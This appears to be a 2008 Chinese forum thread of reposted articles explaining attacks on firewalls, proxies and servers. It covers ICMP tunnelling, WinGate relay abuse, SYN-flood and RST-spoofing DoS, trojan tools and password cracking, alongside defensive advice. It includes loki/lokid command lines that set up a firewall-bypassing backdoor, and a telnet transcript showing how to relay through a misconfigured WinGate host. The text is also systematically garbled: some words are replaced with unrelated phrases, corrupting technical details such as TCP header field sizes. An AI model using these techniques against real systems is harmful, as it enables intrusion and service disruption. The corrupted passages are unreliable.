  说状态检测必须提到动态规则技术。在状态检测里,采用动态规则技术,原先高端口的问题就可以解决了。实现原理是:平时,防火墙可以过滤内部网络的所有端口(1-65535),外部攻击者难于发现入侵的切入点,可是为了不影响正常的服务,防火墙一但检测到服务必须开放高端口时,如(ftp协议,irc 等),防火墙在内存就可以动态地天加一条规则打开相关的高端口。等服务完成后,这条规则就又被防火墙删除。这样,既保障了安全,又不影响正常服务,速度也快。!

  一般来说,完全实现了状态检测技术防火墙,智能性都比较高,一些扫描攻击还能自动的反应,因此,攻击者要很小心才不会被发现。

  但是,也有不少的攻击手段对付这种防火墙的。

  1 协议隧道攻击

  协议隧道的攻击思想类似与VPN的实现原理,攻击者将一些恶意的攻击数据包隐藏在一些协议分组的头部,从而穿透防火墙系统对内部网络进行攻击。

  例如,许多简单地允许ICMP回射请求、ICMP回射应答和UDP分组通过的防火墙就容易受到ICMP和UDP协议隧道的攻击。Loki和lokid (攻击的客户端和服务端)是实施这种攻击的有效的工具。在实际攻击中,攻击者首先必须设法在内部网络的一个系统上安装上lokid服务端,而后攻击者就可以通过loki客户端将希望远程执行的攻击命令(对应IP分组)嵌入在ICMP或UDP包头部,再发送给内部网络服务端lokid,由它执行其中的命令,并以同样的方式返回结果。由

  于许多防火墙允许ICMP和UDP分组自由出入,因此攻击者的恶意数据就能附带在正常的分组,绕过防火墙的认证,顺利地到达攻击目标主机下面的命令是用于启动lokid服务器程序:

lokid-p–I–vl

loki客户程序则如下启动:

loki–d172.29.11.191(攻击目标主机)-p–I–v1–t3

  这样,lokid和loki就联合提供了一个穿透防火墙系统访问目标系统的一个后门。

  2 利用FTP-pasv绕过防火墙认证的攻击

  FTP-pasv攻击是针对防火墙实施入侵的重要手段之一。目前很多防火墙不能过滤这种攻击手段。如CheckPoint的Firewall-1,在监视FTP服务器发送给客户端的包的过程中,它在每个包中寻找"227"这个字符串。如果发现这种包,将从中提取目标地址和端口,并对目标地址加以验证,通过后,将允许建立到该地址的TCP连接。

  攻击者通过这个特性,可以设法连接受防火墙保护的服务器和服务。详细的描述可见:http://www.checkpoint.com/techsupport/alerts/pasvftp.html

  3 反弹木马攻击

  反弹木马是对付这种防火墙的最有效的方法。攻击者在内部网络的反弹木马定时地连接外部攻击者控制的主机,由于连接是从内部发起的,防火墙(任何的防火墙)都认为是一个合法的连接,因此基本上防火墙的盲区就是这里了。防火墙不能区分木马的连接和合法的连接。

  但是这种攻击的局限是:必须首先安装这个木马!!!所有的木马的第一步都是关键!!!

  四 攻击代理

  代理是运行在应用层的防火墙,他实质是启动两个连接,一个是客户到代理,另一个是代理到目的服务器。

  实现上比较简单,和前面的一样也是根据规则过滤。由于运行在应用层速度比较慢/1

  攻击代理的方法很多。

  这里就以wingate为例,简单说说了。(太累了)

  WinGate是目前应用非常广泛的一种Windows95/NT代理防火墙软件,内部用户可以通过一台安装有WinGate的主机访问外部网络,但是它也存在着几个安全脆弱点。

  黑客经常利用这些安全漏洞获得WinGate的非授权Web、Socks和Telnet的访问,从而伪装成WinGate主机的身份对下一个攻击目标发动攻击。因此,这种攻击非常难于被跟踪和记录。
  
  导致WinGate安全漏洞的原因大多数是管理员没有根据网络的实际情况对WinGate代理防火墙软件进行合理的设置,只是简单地从缺省设置安装完毕后就让软件运行,这就给攻击者可乘之机。

  1 非授权Web访问

  某些WinGate版本(如运行在NT系统下的2.1d版本)在误配置情况下,允许外部主机完全匿名地访问因特网。因此,外部攻击者就可以利用 WinGate主机来对Web服务器发动各种Web攻击(如CGI的漏洞攻击等),同时由于Web攻击的所有报文都是从80号Tcp端口穿过的,因此,很难追踪到攻击者的来源。

  检测

  检测WinGate主机是否有这种安全漏洞的方法如下:

  1) 以一个不会被过滤掉的连接(譬如说拨号连接)连接到因特网上。

  2) 把浏览器的代理服务器地址指向待测试的WinGate主机。

  如果浏览器能访问到因特网,则WinGate主机存在着非授权Web访问漏洞。


  2 非授权Socks访问

  在WinGate的缺省配置中,Socks代理(1080号Tcp端口)同样是存在安全漏洞。与打开的Web代理(80号Tcp端口)一样,外部攻击者可以利用Socks代理访问因特网。


  防范

  要防止攻击WinGate的这个安全脆弱点,管理员可以限制特定服务的捆绑。在多宿主(multi homed)系统上,执行以下步骤以限定如何提供代理服务。

  1选择Socks或WWWProxyServer属性。

  2选择Bindings标签。

  3按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。

  非授权Telnet访问

  它是WinGate最具威胁的安全漏洞。通过连接到一个误配置的WinGate服务器的Telnet服务,攻击者可以使用别人的主机隐藏自己的踪迹,随意地发动攻击。

  检测

  检测WinGate主机是否有这种安全漏洞的方法如下:

  1.使用telnet尝试连接到一台WinGate服务器。

[root@happy/tmp]#telnet172.29.11.191

Trying172.29.11.191….

Connectedto172.29.11.191.

Escapecharacteris‘^]’.

Wingate>10.50.21.5


  2.如果接受到如上的响应文本,那就输入待连接到的网站。


  3.如果看到了该新系统的登录提示符,那么该服务器是脆弱的。

Connectedtohost10.50.21.5…Connected

SunOS5.6

Login:

  对策

  防止这种安全脆弱点的方法和防止非授权Socks访问的方法类似。在WinGate中简单地限制特定服务的捆绑就可以解决这个问题。一般来说,在多宿主(multihomed)系统管理员可以通过执行以下步骤来完成:

  1.选择TelnetSever属性。

  2.选择Bindings标签。

  3.按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。


  五 后话

  有防火墙的攻击不单是上面的一点,我有什么写的不对的,大家指正。

  一直以来,黑客都在研究攻击防火墙的技术和手段,攻击的手法和技术越来越智能化和多样化。但是就黑客攻击防火墙的过程上看,大概可以分为三类攻击。

  第一类攻击防火墙的方法是探测在目标网络上安装的是何种防火墙系统并且找出此防火墙系统允许哪些服务。我们叫它为对防火墙的探测攻击。

  第二类攻击防火墙的方法是采取地址欺骗、TCP序号攻击等手法绕过防火墙的认证机制,从而 对防火墙和内部网络破坏。

  第三类攻击防火墙的方法是寻找、利用防火墙系统实现和设计上的安全漏洞,从而有针对性地发动攻击。这种攻击难度比较大,可是破坏性很大。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 48 发表于: 2008-06-14 22:47:11
DOS攻击原理及方法介绍

已经有很多介绍DOS(Denial of Service,即拒绝服务)攻击的文章,但是,多数人还是不知道DOS到底是什么,它到底是怎么实现的。本文主要介绍DOS的机理和常见的实施方法。因前段时间仔细了解了TCP/IP协议以及RFC文档,有点心得。同时,文中有部分内容参考了Shaft的文章翻译而得
。要想了解DOS攻击得实现机理,必须对TCP有一定的了解。所以,本文分为两部分,第一部分介绍一
些实现DOS攻击相关的协议,第二部分则介绍DOS的常见方式。

1、 什么是DOS攻击
DOS:即Denial Of Service,拒绝服务的缩写,可不能认为是微软的dos想跳楼作系统了。好象在5·1的时候闹过这样的笑话。拒绝服务,就相当于必胜客在客满的时候不再让人进去一样,呵呵,你想吃馅饼,就必须在门口等吧。DOS攻击即攻击者想办法让目标机器停止提供服务或资源访问,这些资源包括磁盘空间、内存、进程甚至网络带宽,从而阻止正常用户的访问。比如:
* 试图FLOOD服务器,阻止合法的网络通?br>* 破坏两个机器间的连接,阻止访问服务
* 阻止特殊用户访问服务
* 破坏服务器的服务或者导致服务器死机
不过,只有那些比较阴险的攻击者才单独使用DOS攻击,破坏服务器。通常,DOS攻击会被作为一次入侵的一部分,比如,绕过入侵检测系统的时候,通常从用大量的攻击出发,导致入侵检测系统日志过多或者反应迟钝,这样,入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

2、有关TCP协议的东西
TCP(transmission control protocol,传输控制协议),是用来在不可靠的因特网上提供可靠的、端到端的字节流通讯协议,在RFC793中有正式定义,还有一些解决错误的东西在RFC 1122中有记录,RFC 1323则有TCP的功能扩展。

我们常见到的TCP/IP协议中,IP层不保证将数据报正确传送到目的地,TCP则从本地机器接受用户的数据流,将其分成不超过64K字节的数据片段,将每个数据片段作为单独的IP数据包发送出去,最后在目的地机器中再组合成完整的字节流,TCP协议必须保证可靠性。

发送和接收方的TCP传输以数据段的形式交换数据,一个数据段包括一个固定的20字节头,加上可选部分,后面再跟上数据,TCP协议从发送方传送一个数据段的时候,还要启动计时器,当数据段到达目的地后,接收方还要发送回一个数据段,其中有一个确认序号,它等于希望收到的下一个数据段的顺序号,如果计时器在确认信息到达前超时了,发送方会重新发送这个数据段。

上面,我们总体上了解一点TCP协议,重要的是要熟悉TCP的数据头(header)。因为数据流的传输最重要的就是header里面的东西,至于发送的数据,只是header附带上的。客户端和服务端的服务响应就是同header里面的数据相关,两端的信息交流和交换是根据header中的内容实施的,因此,要实现DOS,就必须对header中的内容非常熟悉。

下面是TCP数据段头格式。
Source Port和 Destination Port :是本地端口和目标端口
Sequence Number 和 Acknowledgment Number :是顺序号和确认号,确认号是希望接收的字节号。这都是32位的,在TCP流中,每个数据字节都被编号。Data offset :表明TCP头包含多少个32位字,用来确定头的长度,因为头中可选字段长度是不定的。Reserved : 保留的我不是人,现在没用,都是0
接下来是6个1位的标志,这是两个计算机数据交流的信息标志。接收和发送断根据这些标志来确定信息流的种类。下面是一些介绍: URG:(Urgent Pointer field significant)紧急指针。用到的时候值为1,用来处理避免TCP数据流中断ACK:(Acknowledgment field significant)置1时表示确认号(Acknowledgment Number)为合法,为0的时候表示数据段不包含确认信息,确认号被忽略。
PSH:(Push Function),PUSH标志的数据,置1时请求的数据段在接收方得到后就可直接送到应用程序,而不必等到缓冲区满时才传送。
RST:(Reset the connection)用于复位因某种原因引起出现的错误连接,也用来拒绝非法数据和请求。如果
接收到RST位时候,通常发生了某些错误。
SYN:(Synchronize sequence numbers)用来建立连接,在连接请求中,SYN=1,CK=0,连接响应时,SYN=1,
ACK=1。即,SYN和ACK来区分Connection Request和Connection Accepted。
FIN:(No more data from sender)用来释放连接,表明发送方已经没有数据发送。

知道这重要的6个指示标志后,我们继续来。
1我不是人的WINDOW字段:表示确认了字节后还可以发送多少字节。可以为0,表示已经收到包括确认号减1(即已发送所有数据)
在内的所有数据段。
接下来是1我不是人的Checksum字段,用来确保可靠性的。
1我不是人的Urgent Pointer,和下面的字段我们这里不解释了。不然太多了。呵呵,偷懒啊。

我们进入比较重要的一部分:TCP连接握手过程。这个过程简单地分为三步。在没有连接中,接受方(我们针对服务器),服务器处于LISTEN状态,等待其他机器发送连接请求。
第一步:客户端发送一个带SYN位的请求,向服务器表示需要连接,比如发送包假设请求序号为10,那么则为:SYN=10,ACK=0,然后等待服务器的响应。
第二步:服务器接收到这样的请求后,查看是否在LISTEN的是指定的端口,不然,就发送RST=1应答,拒绝建立连接。如果接收连接,那么服务器发送确认,SYN为服务器的一个内码,假设为100,ACK位则是客户端的请求序号加1,本例中发送的数据是:SYN=100,ACK=11,用这样的数据发送给客户端。向客户端表示,服务器连接已经准备好了,等待客户端的确认这时客户端接收到消息后,分析得到的信息,准备发送确认连接信号到服务器
第三步:客户端发送确认建立连接的消息给服务器。确认信息的SYN位是服务器发送的ACK位,ACK位是服务器发送的SYN位加1。即:SYN=11,ACK=101。
这时,连接已经建立起来了。然后发送数据,。这是一个基本的请求和连接过程。需要注意的是这些标志位的关系,比如SYN、ACK。

3、服务器的缓冲区队列(Backlog Queue)
服务器不会在每次接收到SYN请求就立刻同客户端建立连接,而是为连接请求分配内存空间,建立会话,并放到一个等待队列中。如果,这个等待的队列已经满了,那么,服务器就不在为新的连接分配任何东西,直接丢弃新的请求。如果到了这样的地步,服务器就是拒绝服务了。
如果服务器接收到一个RST位信息,那么就认为这是一个有错误的数据段,会根据客户端IP,把这样的连接在缓冲区队列中清除掉。这对IP欺骗有影响,也能被利用来做DOS攻击。

####################################################################

上面的介绍,我们了解TCP协议,以及连接过程。要对SERVER实施拒绝服务攻击,实质上的方式就是有两个:
一, 迫使服务器的缓冲区满,不接收新的请求。
二, 使用IP欺骗,迫使服务器把合法用户的连接复位,影响合法用户的连接
这就是DOS攻击实施的基本思想。具体实现有这样的方法:

1、SYN FLOOD
利用服务器的连接缓冲区(Backlog Queue),利用特殊的程序,设置TCP的Header,向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲区队列中。
如果你的SYN请求超过了服务器能容纳的限度,缓冲区队列满,那么服务器就不再接收新的请求了。其他合法用户的连接都被拒绝掉。可以持续你的SYN请求发送,直到缓冲区中都是你的只有SYN标记的请求。现在有很多实施SYN FLOOD的工具,呵呵,自己找去吧。

2、IP欺骗DOS攻击
这种攻击利用RST位来实现。假设现在有一个合法用户(1.1.1.1)已经同服务器建立了正常的连接,攻击者构造攻击的TCP数据,伪装自己的IP为 1.1.1.1,并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后,认为从1.1.1.1发送的连接有错误,就会清空缓冲区中建立好的连接。这时,如果合法用户1.1.1.1再发送合法数据,服务器就已经没有这样的连接了,该用户就必
须从新开始建立连接。攻击时,伪造大量的IP地址,向目标发送RST数据,使服务器不对合法用户服务。

3、 带宽DOS攻击
如果你的连接带宽足够大而服务器又不是很大,你可以发送请求,来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大了,配合上SYN一起实施DOS,威力巨大。不过是初级DOS攻击。呵呵。Ping白宫??你发疯了啊!


4、自身消耗的DOS攻击
这是一种老式的攻击手法。说老式,是因为老式的系统有这样的自身BUG。比如Win95 (winsock v1), Cisco IOS v.10.x, 和其他过时的系统。
这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同,发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快把资源消耗光。直接导致当机。这中伪装对一些身份认证系统还是威胁巨大的。
上面这些实施DOS攻击的手段最主要的就是构造需要的TCP数据,充分利用TCP协议。这些攻击方法都是建立在TCP基础上的。还
有其他的DOS攻击手段。

5、塞满服务器的硬盘
通常,如果服务器可以没有限制地执行写想跳楼作,那么都能成为塞满硬盘造成DOS攻击的途径,比如:
发送垃圾邮件。一般公司的服务器可能把邮件服务器和WEB服务器都放在一起。破坏者可以发送大量的垃圾邮件,这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中,直到邮箱被撑破或者把硬盘塞满。
让日志记录满。入侵者可以构造大量的错误信息发送出来,服务器记录这些错误,可能就造成日志文件非常庞大,甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志,甚至就不能发现入侵者真正的入侵途径。
向匿名FTP塞垃圾文件。这样也可以塞满硬盘空间。

6、合理利用策略
一般服务器都有关于帐户锁定的安全策略,比如,某个帐户连续3次登陆失败,那么这个帐号将被锁定。这点也可以被破坏者利用,他们伪装一个帐号去错误登陆,这样使得这个帐号被锁定,而正常的合法用户就不能使用这个帐号去登陆系统了
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 47 发表于: 2008-06-14 22:46:51
网络常见攻击及防范手册(下)

6、网络监听

  网络监听是主机的一种工作模式,在这种模式下,主机可以接收到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接收方是谁。因为系统在进行密码校验时,用户输入的密码需要从用户端传送到服务器端,而攻击者就能在两端之间进行数据监听。此时若两台主机进行通信的信息没有加密,只要使用某些网络监听工具(如NetXRay for Windows95/98/NT、Sniffit for Linux、Solaries等)就可轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。

  7、利用黑客软件攻击

  利用黑客软件攻击是互联网上比较多的一种攻击手法。Back Orifice2000、冰河等都是比较著名的特洛伊木马,它们可以非法地取得用户电脑的超级用户级权利,可以对其进行完全的控制,除了可以进行文件想跳楼作外,同时也可以进行对方桌面抓图、取得密码等想跳楼作。这些黑客软件分为服务器端和用户端,当黑客进行攻击时,会使用用户端程序登陆上已安装好服务器端程序的电脑,这些服务器端程序都比较小,一般会随附带于某些软件上。有可能当用户下载了一个小游戏并运行时,黑客软件的服务器端就安装完成了,而且大部分黑客软件的重生能力比较强,给用户进行清除造成一定的麻烦。特别是最近出现了一种TXT文件欺骗手法,表面看上去是一个TXT文本文件,但实际上却是一个附带黑客程序的可执行程序,另外有些程序也会伪装成图片和其他格式的文件。

  8、安全漏洞攻击

  许多系统都有这样那样的安全漏洞(Bugs)。其中一些是想跳楼作系统或应用软件本身具有的。如缓冲区溢出攻击。由于很多系统在不检查程序与缓冲之间变化的情况,就任意接受任意长度的数据输入,把溢出的数据放在堆栈里,系统还照常执行命令。这样攻击者只要发送超出缓冲区所能处理的长度的指令,系统便进入不稳定状态。若攻击者特别配置一串准备用作攻击的字符,他甚至可以访问根目录,从而拥有对整个网络的绝对控制权。另一些是利用协议漏洞进行攻击。如攻击者利用POP3一定要在根目录下运行的这一漏洞发动攻击,破坏的根目录,从而获得超级用户的权限。又如,ICMP协议也经常被用于发动拒绝服务攻击。它的具体手法就是向目的服务器发送大量的数据包,几乎占取该服务器所有的网络宽带,从而使其无法对正常的服务请求进行处理,而导致网站无法进入、网站响应速度大大降低或服务器瘫痪。现在常见的蠕虫病毒或与其同类的病毒都可以对服务器进行拒绝服务攻击的进攻。它们的繁殖能力极强,一般通过Microsoft的 Outlook软件向众多邮箱发出带有病毒的邮件,而使邮件服务器无法承担如此庞大的数据处理量而瘫痪。对于个人上网用户而言,也有可能遭到大量数据包的攻击使其无法进行正常的网络想跳楼作。

  9、端口扫描攻击

  所谓端口扫描,就是利用Socket编程与目标主机的某些端口建立TCP连接、进行传输协议的验证等,从而侦知目标主机的扫描端口是否是处于激活状态、主机提供了哪些服务、提供的服务中是否含有某些缺陷等等。常用的扫描方式有:Connect()扫描。Fragmentation扫描
四、攻击者常用的攻击工具

  1、DOS攻击工具:

  如WinNuke通过发送OOB漏洞导致系统蓝屏;Bonk通过发送大量伪造的UDP数据包导致系统重启;TearDrop通过发送重叠的IP碎片导致系统的TCP/IP栈崩溃;WinArp通过发特殊数据包在对方机器上产生大量的窗口;Land通过发送大量伪造源IP的基于SYN的TCP请求导致系统重启动;FluShot通过发送特定IP包导致系统凝固;Bloo通过发送大量的ICMP数据包导致系统变慢甚至凝固;PIMP通过IGMP漏洞导致系统蓝屏甚至重新启动;Jolt通过大量伪造的ICMP和UDP导致系统变的非常慢甚至重新启动。

  2、木马程序

  (1)、BO2000(BackOrifice):它是功能最全的TCP/IP构架的攻击工具,可以搜集信息,执行系统命令,重新设置机器,重新定向网络的客户端/服务器应用程序。BO2000支持多个网络协议,它可以利用TCP或UDP来传送,还可以用XOR加密算法或更高级的3DES加密算法加密。感染BO2000后机器就完全在别人的控制之下,黑客成了超级用户,你的所有想跳楼作都可由BO2000自带的“秘密摄像机”录制成“录像带”。

  (2)、“冰河”:冰河是一个国产木马程序,具有简单的中文使用界面,且只有少数流行的反病毒、防火墙才能查出冰河的存在。冰河的功能比起国外的木马程序来一点也不逊色。它可以自动跟踪目标机器的屏幕变化,可以完全模拟键盘及鼠标输入,即在使被控端屏幕变化和监控端产生同步的同时,被监控端的一切键盘及鼠标想跳楼作将反映在控端的屏幕。它可以记录各种口令信息,包括开机口令、屏保口令、各种共享资源口令以及绝大多数在对话框中出现过的口令信息;它可以获取系统信息;它还可以进行注册表想跳楼作,包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表想跳楼作。

  (3)、NetSpy:可以运行于Windows95/98/NT/2000等多种平台上,它是一个基于TCP/IP的简单的文件传送软件,但实际上你可以将它看作一个没有权限控制的增强型FTP服务器。通过它,攻击者可以神不知鬼不觉地下载和上传目标机器上的任意文件,并可以执行一些特殊的想跳楼作。

  (4)、Glacier:该程序可以自动跟踪目标计算机的屏幕变化、获取目标计算机登录口令及各种密码类信息、获取目标计算机系统信息、限制目标计算机系统功能、任意想跳楼作目标计算机文件及目录、远程关机、发送信息等多种监控功能。类似于BO2000。

  (5)、KeyboardGhost:Windows系统是一个以消息循环(MessageLoop)为基础的想跳楼作系统。系统的核心区保留了一定的字节作为键盘输入的缓冲区,其数据结构形式是队列。键盘幽灵正是通过直接访问这一队列,使键盘上输入你的电子邮箱、代理的账号、密码Password (显示在屏幕上的是星号)得以记录,一切涉及以星号形式显示出来的密码窗口的所有符号都会被记录下来,并在系统根目录下生成一文件名为KG.DAT的隐含文件。

  (6)、ExeBind:这个程序可以将指定的攻击程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序也在后台被执行,且支持多重捆绑。实际上是通过多次分割文件,多次从父进程中调用子进程来实现的。
五、网络攻击应对策略

  在对网络攻击进行上述分析与识别的基础上,我们应当认真制定有针对性的策略。明确安全对象,设置强有力的安全保障体系。有的放矢,在网络中层层设防,发挥网络的每层作用,使每一层都成为一道关卡,从而让攻击者无隙可钻、无计可使。还必须做到未雨稠缪,预防为主,将重要的数据备份并时刻注意系统运行状况。以下是针对众多令人担心的网络安全问题,提出的几点建议

  1、提高安全意识

  (1)不要随意打开来历不明的电子邮件及文件,不要随便运行不太了解的人给你的程序,比如“特洛伊”类黑客程序就需要骗你运行。
  (2)尽量避免从Internet下载不知名的软件、游戏程序。即使从知名的网站下载的软件也要及时用最新的病毒和木马查杀软件对软件和系统进行扫描。
  (3)密码设置尽可能使用字母数字混排,单纯的英文或者数字很容易穷举。将常用的密码设置不同,防止被人查出一个,连带到重要密码。重要密码最好经常更换。
  (4)及时下载安装系统补丁程序。
  (5)不随便运行黑客程序,不少这类程序运行时会发出你的个人信息。
  (6)在支持HTML的BBS上,如发现提交警告,先看源代码,很可能是骗取密码的陷阱。

  2、使用防毒、防黑等防火墙软件。

  防火墙是一个用以阻止网络中的黑客访问某个机构网络的屏障,也可称之为控制进/出两个方向通信的门槛。在网络边界上通过建立起来的相应网络通信监控系统来隔离内部和外部网络,以阻档外部网络的侵入。

  3、设置代理服务器,隐藏自已的IP地址。

  保护自己的IP地址是很重要的。事实上,即便你的机器上被安装了木马程序,若没有你的IP地址,攻击者也是没有办法的,而保护IP地址的最好方法就是设置代理服务器。代理服务器能起到外部网络申请访问内部网络的中间转接作用,其功能类似于一个数据转发器,它主要控制哪些用户能访问哪些服务类型。当外部网络向内部网络申请某种网络服务时,代理服务器接受申请,然后它根据其服务类型、服务内容、被服务的对象、服务者申请的时间、申请者的域名范围等来决定是否接受此项服务,如果接受,它就向内部网络转发这项请求。

  4、将防毒、防黑当成日常例性工作,定时更新防毒组件,将防毒软件保持在常驻状态,以彻底防毒。

  5、由于黑客经常会针对特定的日期发动攻击,计算机用户在此期间应特别提高警戒。

  6、对于重要的个人资料做好严密的保护,并养成资料备份的习惯。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 46 发表于: 2008-06-14 22:46:31
网络常见攻击及防范手册(上)

一、前言

  在网络这个不断更新换代的世界里,网络中的安全漏洞无处不在。即便旧的安全漏洞补上了,新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏 洞和安全缺陷对系统和资源进行攻击。

  也许有人会对网络安全抱着无所谓的态度,认为最多不过是被攻击者盗用账号,造不成多大的危害。他们往往会认为“安全”只是针对那些大中型企事业单位和网站而言。其实,单从技术上说,黑客入侵的动机是成为目标主机的主人。只要他们获得了一台网络主机的超级用户权限后他们就有可能在该主机上修改资源配置、安置“特洛伊”程序、隐藏行踪、执行任意进程等等。我们谁又愿意别人在我们的机器上肆无忌惮地拥有这些特权呢?更何况这些攻击者的动机也不都是那么单纯。因此,我们每一个人都有可能面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题。

  下面我们就来看一下那些攻击者是如何找到你计算机中的安全漏洞的,并了解一下他们的攻击手法。

  二、网络攻击的步骤

  第一步:隐藏自已的位置

  普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。老练的攻击者还会利用800电话的无人转接服务联接ISP,然后再盗用他人的帐号上网。

  第二步:寻找目标主机并分析目标主机

  攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的想跳楼作系统类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,轻松获取目标主机运行的是哪种想跳楼作系统的哪个版本,系统有哪些帐户,WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料,为入侵作好充分的准备。

  第三步:获取帐号和密码,登录主机

  攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

  第四步:获得控制权

  攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程想跳楼纵程序,以便日后可以不被觉察地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用了,甚至新文件的大小都和原文件一模一样。攻击者一般会使用rep传递这些文件,以便不留下FTB记录。清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。

  第五步:窃取网络资源和特权

  攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;实施窃取帐号密码、信用卡号等经济偷窃;使网络瘫痪。

三、网络攻击的原理和手法

  1、口令入侵

  所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机,然后再实施攻击活动。这种方法的前提是必须先得到该主机上的某个合法用户的帐号,然后再进行合法用户口令的破译。获得普通用户帐号的方法很多,如

  利用目标主机的Finger功能:当用Finger命令查询时,主机系统会将保存的用户资料(如用户名、登录时间等)显示在终端或计算机上;
  利用目标主机的X.500服务:有些主机没有关闭X.500的目录查询服务,也给攻击者提供了获得信息的一条简易途径;
  从电子邮件地址中收集:有些用户电子邮件地址常会透露其在目标主机上的帐号;
  查看主机是否有习惯性的帐号:有经验的用户都知道,很多系统会使用一些习惯性的帐号,造成帐号的泄露。

  这又有三种方法:

  (1)是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大。监听者往往采用中途截击的方法也是获取用户帐户和密码的一条有效途径。当下,很多协议根本就没有采用任何加密或身份认证技术,如在Telnet、FTP、HTTP、SMTP等传输协议中,用户帐户和密码信息都是以明文格式传输的,此时若攻击者利用数据包截取工具便可很容易收集到你的帐户和密码。还有一种中途截击攻击方法更为厉害,它可以在你同服务器端完成“三次握手”建立连接之后,在通信过程中扮演“第三者”的角色,假冒服务器身份欺骗你,再假冒你向服务器发出恶意请求,其造成的后果不堪设想。另外,攻击者有时还会利用软件和硬件工具时刻监视系统主机的工作,等待记录用户登录信息,从而取得用户密码;或者编制有缓冲区溢出错误的SUID程序来获得超级用户权限。

  (2)是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但攻击者要有足够的耐心和时间。如:采用字典穷举法(或称暴力法)来破解用户的密码。攻击者可以通过一些工具程序,自动地从电脑字典中取出一个单词,作为用户的口令,再输入给远端的主机,申请进入系统;若口令错误,就按序取出下一个单词,进行下一个尝试,并一直循环下去,直到找到正确的口令或字典的单词试完为止。由于这个破译过程由计算机程序来自动完成,因而几个小时就可以把上十万条记录的字典里所有单词都尝试一遍。

  (3)是利用系统管理员的失误。在现代的Unix想跳楼作系统中,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密方法加密后专门存放在一个叫shadow的文件中。黑客们获取口令文件后,就会使用专门的破解DES加密法的程序来解口令。同时,由于为数不少的想跳楼作系统都存在许多安全漏洞、Bug或一些其他设计缺陷,这些缺陷一旦被找出,黑客就可以长驱直入。例如,让Windows95/98系统后门洞开的BO就是利用了 Windows的基本设计缺陷。
2、放置特洛伊木马程序

  特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知攻击者,来报告您的IP地址以及预先设定的端口。攻击者在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改你的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。

  3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。

  一般Web欺骗使用两种技术手段,即URL地址重写技术和相关信关信息掩盖技术。利用URL地址,使这些地址都向攻击者的Web服务器,即攻击者可以将自已的Web地址加在所有URL地址的前面。这样,当用户与站点进行安全链接时,就会毫不防备地进入攻击者的服器,于是用记的所有信息便处于攻击者的监视之中。但由于浏览器材一般均设有地址栏和状态栏,当浏览器与某个站点边接时,可以在地址栏和状态样中获得连接中的Web站点地址及其相关的传输信息,用户由此可以发现问题,所以攻击者往往在URLf址重写的同时,利用相关信息排盖技术,即一般用javascript程序来重写地址样和状枋样,以达到其排盖欺骗的目的。

  4、电子邮件攻击

  电子邮件是互联网上运用得十分广泛的一种通讯方式。攻击者可以使用一些邮件炸弹软件或CGI程序向目的邮箱发送大量内容重复、无用的垃圾邮件,从而使目的邮箱被撑爆而无法使用。当垃圾邮件的发送流量特别大时,还有可能造成邮件系统对于正常的工作反映缓慢,甚至瘫痪。相对于其它的攻击手段来说,这种攻击方法具有简单、见效快等优点。

